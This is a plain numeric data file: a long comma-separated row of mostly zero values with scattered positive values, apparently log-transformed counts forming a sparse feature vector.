0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2832037287379885, 0.0, 0.0, 4.518263445217986, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7376696182833684, 0, 0, 5.780743515792329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.2626798770413155, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 2.833213344056216, 3.8005740880419454, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.02535169073515, 0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.4849066497880004, 0, 0.0, 0.0, 3.784189633918261, 0.0, 2.772588722239781, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.613324979540639, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 6.102339570951937, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.6931471805599453, 0, 0.0, 4.182806904693496, 0.0, 0.0, 0, 3.5553480614894135, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.365976015021851, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.147494476813453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 